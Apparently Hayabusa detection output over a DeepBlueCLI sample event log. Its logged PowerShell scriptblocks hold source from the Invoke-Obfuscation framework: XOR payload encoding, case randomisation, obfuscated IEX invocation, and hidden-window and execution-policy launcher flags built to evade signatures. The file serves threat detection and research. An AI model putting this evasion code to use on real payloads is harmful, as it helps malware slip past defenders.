@('PtrToStringAnsi',('([Runtime.InteropServices.Marshal].GetMembers()[' + (Get-Random -Input @(0,1)) + '].Name).Invoke'))) # Below four notations are commented out as they only work on PS 3.0+ #$PtrToStringBSTR = (Get-Random -Input @('PtrToStringBSTR' ,'([Runtime.InteropServices.Marshal].GetMembers()[142].Name).Invoke')) #$SecureStringToBSTR = (Get-Random -Input @('SecureStringToBSTR' ,'([Runtime.InteropServices.Marshal].GetMembers()[162].Name)')) #$SecureStringToGlobalAllocUnicode = (Get-Random -Input @('SecureStringToGlobalAllocUnicode','([Runtime.InteropServices.Marshal].GetMembers()[169].Name)')) #$SecureStringToGlobalAllocAnsi = (Get-Random -Input @('SecureStringToGlobalAllocAnsi' ,'([Runtime.InteropServices.Marshal].GetMembers()[168].Name)')) # Randomize the case versions for necessary operations. $PtrToStringAuto = ([Char[]]""[Runtime.InteropServices.Marshal]::$PtrToStringAuto("" | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $PtrToStringUni = ([Char[]]""[Runtime.InteropServices.Marshal]::$PtrToStringUni("" | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $PtrToStringAnsi = ([Char[]]""[Runtime.InteropServices.Marshal]::$PtrToStringAnsi("" | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $PtrToStringBSTR = ([Char[]]'[Runtime.InteropServices.Marshal]::PtrToStringBSTR(' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $SecureStringToBSTR = ([Char[]]'[Runtime.InteropServices.Marshal]::SecureStringToBSTR(' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $SecureStringToGlobalAllocUnicode = ([Char[]]'[Runtime.InteropServices.Marshal]::SecureStringToGlobalAllocUnicode(' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $SecureStringToGlobalAllocAnsi = ([Char[]]'[Runtime.InteropServices.Marshal]::SecureStringToGlobalAllocAnsi(' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $NewObject = ([Char[]]'New-Object ' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $PSCredential = ([Char[]]'Management.Automation.PSCredential ' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $ConvertToSecureString = ([Char[]]'ConvertTo-SecureString' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Key = ([Char[]]$Key | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $GetNetworkCredential = ([Char[]]').GetNetworkCredential().Password' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Set syntax for running ConvertTo-SecureString cmdlet. $ConvertToSecureStringSyntax = '$(' + ""'$SecureStringText'"" + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ConvertToSecureString + ' '*(Get-Random -Input @(0,1)) + $Key + ' '*(Get-Random -Input @(0,1)) + $SecureStringKeyStr + ')' + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ')' # Generate the code that will decrypt and execute the payload and randomly select one. $NewScriptArray = @() $NewScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + $PtrToStringAuto + ' '*(Get-Random -Input @(0,1)) + $SecureStringToBSTR + ' '*(Get-Random -Input @(0,1)) + $ConvertToSecureStringSyntax $NewScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + $PtrToStringUni + ' '*(Get-Random -Input @(0,1)) + $SecureStringToGlobalAllocUnicode + ' '*(Get-Random -Input @(0,1)) + $ConvertToSecureStringSyntax $NewScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + $PtrToStringAnsi + ' '*(Get-Random -Input @(0,1)) + $SecureStringToGlobalAllocAnsi + ' '*(Get-Random -Input @(0,1)) + $ConvertToSecureStringSyntax $NewScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + $PtrToStringBSTR + ' '*(Get-Random -Input @(0,1)) + $SecureStringToBSTR + ' '*(Get-Random -Input @(0,1)) + $ConvertToSecureStringSyntax $NewScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + $NewObject + ' '*(Get-Random -Input @(0,1)) + $PSCredential + ' '*(Get-Random -Input @(0,1)) + ""' '"" + ',' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + ""'$SecureStringText'"" + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ConvertToSecureString + ' '*(Get-Random -Input @(0,1)) + $Key + ' '*(Get-Random -Input @(0,1)) + $SecureStringKeyStr + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + $GetNetworkCredential # Select random option from above. $NewScript = (Get-Random -Input $NewScriptArray) # Generate random invoke operation syntax. # Below code block is a copy from Out-ObfuscatedStringCommand.ps1. It is copied into this encoding function so that this will remain a standalone script without dependencies. $InvokeExpressionSyntax = @() $InvokeExpressionSyntax += (Get-Random -Input @('IEX','Invoke-Expression')) # Added below slightly-randomized obfuscated ways to form the string 'iex' and then invoke it with . or &. # Though far from fully built out (and not sure that I ever will), these are included to highlight how IEX/Invoke-Expression is a great indicator but not a silver bullet. # These methods draw on common environment variable values and PowerShell Automatic Variable values/methods/members/properties/etc. $InvocationOperator = (Get-Random -Input @('.','&')) + ' '*(Get-Random -Input @(0,1)) $InvokeExpressionSyntax += $InvocationOperator + ""( `$ShellId[1]+`$ShellId[13]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$PSHome["" + (Get-Random -Input @(4,21)) + ""]+`$PSHome["" + (Get-Random -Input @(30,34)) + ""]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:Public[13]+`$env:Public[5]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:ComSpec[4,"" + (Get-Random -Input @(15,24,26)) + "",25]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""(("" + (Get-Random -Input @('Get-Variable','GV','Variable')) + "" '*mdr*').Name[3,11,2]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @('$VerbosePreference.ToString()','([String]$VerbosePreference)')) + ""[1,3]+'x'-Join'')"" # Randomly choose from above invoke operation syntaxes. $InvokeExpression = (Get-Random -Input $InvokeExpressionSyntax) # Randomize the case of selected invoke operation. $InvokeExpression = ([Char[]]$InvokeExpression | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Generate random Invoke-Expression/IEX syntax and ordering: IEX ($ScriptString) or ($ScriptString | IEX) $InvokeOptions = @() $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $InvokeExpression + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $InvokeExpression # Select random option from above. $NewScript = (Get-Random -Input $InvokeOptions) # If user did not include -PassThru flag then continue with adding execution flgs and powershell.exe to $NewScript. If(!$PSBoundParameters['PassThru']) { # Array to store all selected PowerShell execution flags. $PowerShellFlags = @() # Build the PowerShell execution flags by randomly selecting execution flags substrings and randomizing the order. # This is to prevent Blue Team from placing false hope in simple signatures for common substrings of these execution flags. $CommandlineOptions = New-Object String[](0) If($PSBou",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.271 +00:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.271 +00:00,SEC511,4104,high,Exec,Accessing WinAPI in PowerShell,,rules/sigma/powershell/powershell_script/posh_ps_accessing_win_api.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.271 +00:00,SEC511,4104,medium,,Potentially Malicious PwSh,"ndParameters['NoExit']) { $FullArgument = ""-NoExit""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoProfile']) { $FullArgument = ""-NoProfile""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NonInteractive']) { $FullArgument = ""-NonInteractive""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 5 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoLogo']) { $FullArgument = ""-NoLogo""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['WindowStyle'] -OR $WindowsStyle) { $FullArgument = ""-WindowStyle"" If($WindowsStyle) {$ArgumentValue = $WindowsStyle} Else {$ArgumentValue = $PSBoundParameters['WindowStyle']} # Randomly decide to write WindowStyle value with flag substring or integer value. Switch($ArgumentValue.ToLower()) { 'normal' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('0','n','no','nor','norm','norma'))}} 'hidden' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('1','h','hi','hid','hidd','hidde'))}} 'minimized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('2','mi','min','mini','minim','minimi','minimiz','minimize'))}} 'maximized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('3','ma','max','maxi','maxim','maximi','maximiz','maximize'))}} default {Write-Error ""An invalid `$ArgumentValue value ($ArgumentValue) was passed to switch block for Out-PowerShellLauncher.""; Exit;} } $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } If($PSBoundParameters['ExecutionPolicy'] -OR $ExecutionPolicy) { $FullArgument = ""-ExecutionPolicy"" If($ExecutionPolicy) {$ArgumentValue = $ExecutionPolicy} Else {$ArgumentValue = $PSBoundParameters['ExecutionPolicy']} # Take into account the shorted flag of -EP as well. $ExecutionPolicyFlags = @() $ExecutionPolicyFlags += '-EP' For($Index=3; $Index -le $FullArgument.Length; $Index++) { $ExecutionPolicyFlags += $FullArgument.SubString(0,$Index) } $ExecutionPolicyFlag = Get-Random -Input $ExecutionPolicyFlags $PowerShellFlags += $ExecutionPolicyFlag + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } # Randomize the order of the execution flags. # This is to prevent the Blue Team from placing false hope in simple signatures for ordering of these flags. If($CommandlineOptions.Count -gt 1) { $CommandlineOptions = Get-Random -InputObject $CommandlineOptions -Count $CommandlineOptions.Count } # If selected then the -Command flag needs to be added last. If($PSBoundParameters['Command']) { $FullArgument = ""-Command"" $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) } # Randomize the case of all command-line arguments. For($i=0; $i -lt $PowerShellFlags.Count; $i++) { $PowerShellFlags[$i] = ([Char[]]$PowerShellFlags[$i] | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } # Random-sized whitespace between all execution flags and encapsulating final string of execution flags. $CommandlineOptions = ($CommandlineOptions | ForEach-Object {$_ + "" ""*(Get-Random -Minimum 1 -Maximum 3)}) -Join '' $CommandlineOptions = "" ""*(Get-Random -Minimum 0 -Maximum 3) + $CommandlineOptions + "" ""*(Get-Random -Minimum 0 -Maximum 3) # Build up the full command-line string. If($PSBoundParameters['Wow64']) { $CommandLineOutput = ""$($Env:windir)\SysWOW64\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" } Else { # Obfuscation isn't about saving space, and there are reasons you'd potentially want to fully path powershell.exe (more info on this soon). #$CommandLineOutput = ""$($Env:windir)\System32\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" $CommandLineOutput = ""powershell $($CommandlineOptions) `""$NewScript`"""" } # Make sure final command doesn't exceed cmd.exe's character limit. $CmdMaxLength = 8190 If($CommandLineOutput.Length -gt $CmdMaxLength) { Write-Warning ""This command exceeds the cmd.exe maximum allowed length of $CmdMaxLength characters! Its length is $($CmdLineOutput.Length) characters."" } $NewScript = $CommandLineOutput } Return $NewScript }",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.271 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"ndParameters['NoExit']) { $FullArgument = ""-NoExit""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoProfile']) { $FullArgument = ""-NoProfile""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NonInteractive']) { $FullArgument = ""-NonInteractive""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 5 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoLogo']) { $FullArgument = ""-NoLogo""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['WindowStyle'] -OR $WindowsStyle) { $FullArgument = ""-WindowStyle"" If($WindowsStyle) {$ArgumentValue = $WindowsStyle} Else {$ArgumentValue = $PSBoundParameters['WindowStyle']} # Randomly decide to write WindowStyle value with flag substring or integer value. Switch($ArgumentValue.ToLower()) { 'normal' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('0','n','no','nor','norm','norma'))}} 'hidden' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('1','h','hi','hid','hidd','hidde'))}} 'minimized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('2','mi','min','mini','minim','minimi','minimiz','minimize'))}} 'maximized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('3','ma','max','maxi','maxim','maximi','maximiz','maximize'))}} default {Write-Error ""An invalid `$ArgumentValue value ($ArgumentValue) was passed to switch block for Out-PowerShellLauncher.""; Exit;} } $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } If($PSBoundParameters['ExecutionPolicy'] -OR $ExecutionPolicy) { $FullArgument = ""-ExecutionPolicy"" If($ExecutionPolicy) {$ArgumentValue = $ExecutionPolicy} Else {$ArgumentValue = $PSBoundParameters['ExecutionPolicy']} # Take into account the shorted flag of -EP as well. $ExecutionPolicyFlags = @() $ExecutionPolicyFlags += '-EP' For($Index=3; $Index -le $FullArgument.Length; $Index++) { $ExecutionPolicyFlags += $FullArgument.SubString(0,$Index) } $ExecutionPolicyFlag = Get-Random -Input $ExecutionPolicyFlags $PowerShellFlags += $ExecutionPolicyFlag + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } # Randomize the order of the execution flags. # This is to prevent the Blue Team from placing false hope in simple signatures for ordering of these flags. If($CommandlineOptions.Count -gt 1) { $CommandlineOptions = Get-Random -InputObject $CommandlineOptions -Count $CommandlineOptions.Count } # If selected then the -Command flag needs to be added last. If($PSBoundParameters['Command']) { $FullArgument = ""-Command"" $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) } # Randomize the case of all command-line arguments. For($i=0; $i -lt $PowerShellFlags.Count; $i++) { $PowerShellFlags[$i] = ([Char[]]$PowerShellFlags[$i] | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } # Random-sized whitespace between all execution flags and encapsulating final string of execution flags. $CommandlineOptions = ($CommandlineOptions | ForEach-Object {$_ + "" ""*(Get-Random -Minimum 1 -Maximum 3)}) -Join '' $CommandlineOptions = "" ""*(Get-Random -Minimum 0 -Maximum 3) + $CommandlineOptions + "" ""*(Get-Random -Minimum 0 -Maximum 3) # Build up the full command-line string. If($PSBoundParameters['Wow64']) { $CommandLineOutput = ""$($Env:windir)\SysWOW64\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" } Else { # Obfuscation isn't about saving space, and there are reasons you'd potentially want to fully path powershell.exe (more info on this soon). #$CommandLineOutput = ""$($Env:windir)\System32\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" $CommandLineOutput = ""powershell $($CommandlineOptions) `""$NewScript`"""" } # Make sure final command doesn't exceed cmd.exe's character limit. $CmdMaxLength = 8190 If($CommandLineOutput.Length -gt $CmdMaxLength) { Write-Warning ""This command exceeds the cmd.exe maximum allowed length of $CmdMaxLength characters! Its length is $($CmdLineOutput.Length) characters."" } $NewScript = $CommandLineOutput } Return $NewScript }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.271 +00:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.276 +00:00,SEC511,4104,medium,,Potentially Malicious PwSh,"# This file is part of Invoke-Obfuscation. # # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Function Out-EncodedBXORCommand { <# .SYNOPSIS Generates BXOR (bitwise XOR) encoded payload for a PowerShell command or script. Optionally it adds command line output to final command. Invoke-Obfuscation Function: Out-EncodedBXORCommand Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-EncodedBXORCommand encodes an input PowerShell scriptblock or path as an bitwise XOR'd payload. It randomly chooses between .Split/-Split/array syntax to store the encoded payload in the final output. The purpose is to highlight to the Blue Team that there are more novel ways to encode a PowerShell command other than the most common Base64 approach. .PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER Path Specifies the path to your payload. .PARAMETER NoExit Outputs the option to not exit after running startup commands. .PARAMETER NoProfile Outputs the option to not load the Windows PowerShell profile. .PARAMETER NonInteractive Outputs the option to not present an interactive prompt to the user. .PARAMETER NoLogo Outputs the option to not present the logo to the user. .PARAMETER Wow64 Calls the x86 (Wow64) version of PowerShell on x86_64 Windows installations. .PARAMETER Command Outputs the option to execute the specified commands (and any parameters) as though they were typed at the Windows PowerShell command prompt. .PARAMETER WindowStyle Outputs the option to set the window style to Normal, Minimized, Maximized or Hidden. .PARAMETER ExecutionPolicy Outputs the option to set the default execution policy for the current session. .PARAMETER PassThru (Optional) Avoids applying final command line syntax if you want to apply more obfuscation functions (or a different launcher function) to the final output. .EXAMPLE C:\PS> Out-EncodedBXORCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive powershell -NoProfil -NonInter ""((97,68 ,95 ,66,83 , 27 , 126, 89 , 69 , 66 ,22 ,17 , 126,83,90 , 90 ,89,22 , 97,89, 68 ,90 ,82 , 23 , 17 ,22 , 27 , 112, 89 ,68, 83 , 81,68 , 89,67 ,88 , 82 ,117, 89 , 90,89, 68 , 22 ,113,68 , 83,8 3 ,88,13 , 22,97,68 , 95,66 , 83,27 ,126,89 , 69 , 66 , 22 , 17 , 121,84, 80, 67 ,69,85,87, 66,95, 89, 88 , 22, 100 ,89, 85, 93 , 69, 23, 17 ,22,27 , 112,89 ,68 ,83 ,81 , 68 , 89, 67, 88 ,82,117, 89,90 , 89, 68,22 ,113,68, 83 , 83,88 ) | fOREACh-objEct{[ChAR]($_ -bxoR'0x36' )} )-jOIn'' | InVOKE-ExpressIon"" C:\PS> Out-EncodedBXORCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive -PassThru ( ( 180,145 , 138 ,151, 134, 206 ,171 , 140, 144 ,151 , 195 ,196 , 171 ,134, 143 ,143,140 , 195 ,180, 140 , 145 ,143,135 , 194,196 , 195, 206, 165,140 ,145,134,132,145,140 , 150 ,141, 135 , 160, 140 ,143 , 140 ,145 , 195,164,145 , 134 , 134 , 141 ,216 ,195 ,180 ,145 ,138, 151 ,134 ,206, 171,140 , 144 ,151,195 ,196,172,129 ,133 ,150,144 , 128 ,130 ,151 ,138,140 ,141 , 195 , 177,140,128,136 , 144 , 194, 196 ,195,206,165 , 140 , 145,134,132, 145 ,140 ,150 ,141,135 , 16 0 , 140, 143, 140 , 145 ,195 ,164 ,145,134 , 134, 141) | fOrEAch-ObJect {[chaR] ( $_-BXor 0xE3 ) } )-jOIN'' | iEx .NOTES This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding(DefaultParameterSetName = 'FilePath')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 0, ParameterSetName = 'FilePath')] [ValidateNotNullOrEmpty()] [String] $Path, [Switch] $NoExit, [Switch] $NoProfile, [Switch] $NonInteractive, [Switch] $NoLogo, [Switch] $Wow64, [Switch] $Command, [ValidateSet('Normal', 'Minimized', 'Maximized', 'Hidden')] [String] $WindowStyle, [ValidateSet('Bypass', 'Unrestricted', 'RemoteSigned', 'AllSigned', 'Restricted')] [String] $ExecutionPolicy, [Switch] $PassThru ) # Either convert ScriptBlock to a String or convert script at $Path to a String. If($PSBoundParameters['Path']) { Get-ChildItem $Path -ErrorAction Stop | Out-Null $ScriptString = [IO.File]::ReadAllText((Resolve-Path $Path)) } Else { $ScriptString = [String]$ScriptBlock } # Create list of random delimiters $RandomDelimiters. # Avoid using . * ' "" [ ] ( ) etc. as delimiters as these will cause problems in the -Split command syntax. $RandomDelimiters = @('_','-',',','{','}','~','!','@','%','&','<','>') # Add letters a-z with random case to $RandomDelimiters. @('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') | ForEach-Object {$UpperLowerChar = $_; If(((Get-Random -Input @(1..2))-1 -eq 0)) {$UpperLowerChar = $UpperLowerChar.ToUpper()} $RandomDelimiters += $UpperLowerChar} # Only use a subset of current delimiters to randomize what you see in every iteration of this script's output. $RandomDelimiters = (Get-Random -Input $RandomDelimiters -Count ($RandomDelimiters.Count/4)) # Generate random hex value for BXOR. Keep from 0x00 to 0x5F to avoid character representations on the command line that are unsupported by PowerShell. $HexDigitRange = @(0,1,2,3,4,5,6,7,8,9,'a','A','b','B','c','C','d','D','e','E','f','F') $BXORValue = '0x' + (Get-Random -Input @(0..5)) + (Get-Random -Input $HexDigitRange) # Convert $ScriptString to delimited and BXOR'd ASCII values in [Char] array separated by random delimiter from defined list $RandomDelimiters. $DelimitedEncodedArray = '' ([Char[]]$ScriptString) | ForEach-Object {$DelimitedEncodedArray += ([String]([Int][Char]$_ -BXOR $BXORValue) + (Get-Random -Input $RandomDelimiters))} # Remove trailing delimiter from $DelimitedEncodedArray. $DelimitedEncodedArray = $DelimitedEncodedArray.SubString(0,$DelimitedEncodedArray.Length-1) # Create printable version of $RandomDelimiters in random order to be used by final command. $RandomDelimitersToPrint = (Get-Random -Input $RandomDelimiters -Count $RandomDelimiters.Length) -Join '' # Generate random case versions for necessary operations. $ForEachObject = Get-Random -Input @('ForEach','ForEach-Object','%') $StrJoin = ([Char[]]'[String]::Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $StrStr = ([Char[]]'[String]' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Join = ([Char[]]'-Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $BXOR = ([Char[]]'-BXOR' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $CharStr = ([Char[]]'Char' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Int = ([Char[]]'Int' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $ForEachObject = ([Char[]]$ForEachObject | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Create printable version of $RandomDelimiters in random order to be used by final command specifically for -Split syntax. $RandomDelimitersToPrintForDashSplit = '' ForEach($RandomDelimiter in $RandomDelimiters) { # Random case 'split' string. If($ScriptString.Contains('^')) { $Split = ([Char[]]'Split' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $RandomDelimitersToPrintForDashSplit += '(' + (Get-Random -Input @('-Replace','-CReplace')) + "" '^','' -$Split"" + ' '*(Get-Random -Input @(0,1)) + ""'"" + $RandomDelimiter + ""'"" + ' '*(Get-Random -Input @(0,1)) $Split = ([Char[]]""Replace('^','').Split"" | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } Else { $Split = ([Char[]]'Split' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $RandomDelimitersToPrintForDashSplit += ('-' + $Split + ' '*(Get-Random -Input @(0,1)) + ""'"" + $RandomDelimiter + ""'"" + ' '*(Get-Random -Input @(0,1))) } # Randomize case of full syntax from above If/Else block. $Split = ([Char[]]$Split | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $RandomDelimitersToPrintForDashSplit = ([Char[]]$RandomDelimitersToPrintForDashSplit | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } $RandomDelimitersToPrintForDashSplit = $RandomDelimitersToPrintForDashSplit.Trim() # Perform BXOR operation on $ScriptString. $EncodedArray = '' ([Char[]]$ScriptString) | ForEach-Object {$EncodedArray += ([String]([Int][Char]$_ -BXOR $BXORValue)) + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1))} # Remove trailing comma from $EncodedArray. $EncodedArray = ('(' + ' '*(Get-Random -Input @(0,1)) + $EncodedArray.Trim().Trim(',') + ')') # Generate random syntax to create/set OFS variable ($OFS is the Output Field Separator automatic variable). # Using Set-Item and Set-Variable/SV/SET syntax. Not using New-Item in case OFS variable already exists. # If the OFS variable did exists then we could use even more syntax: $varname, Set-Variable/SV, Set-Item/SET, Get-Variable/GV/Variable, Get-ChildItem/GCI/ChildItem/Dir/Ls # For more info: https://msdn.microsoft.com/en-us/powershell/reference/5.1/microsoft.powershell.core/about/about_automatic_variables $SetOfsVarSyntax = @() $SetOfsVarSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVarSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" 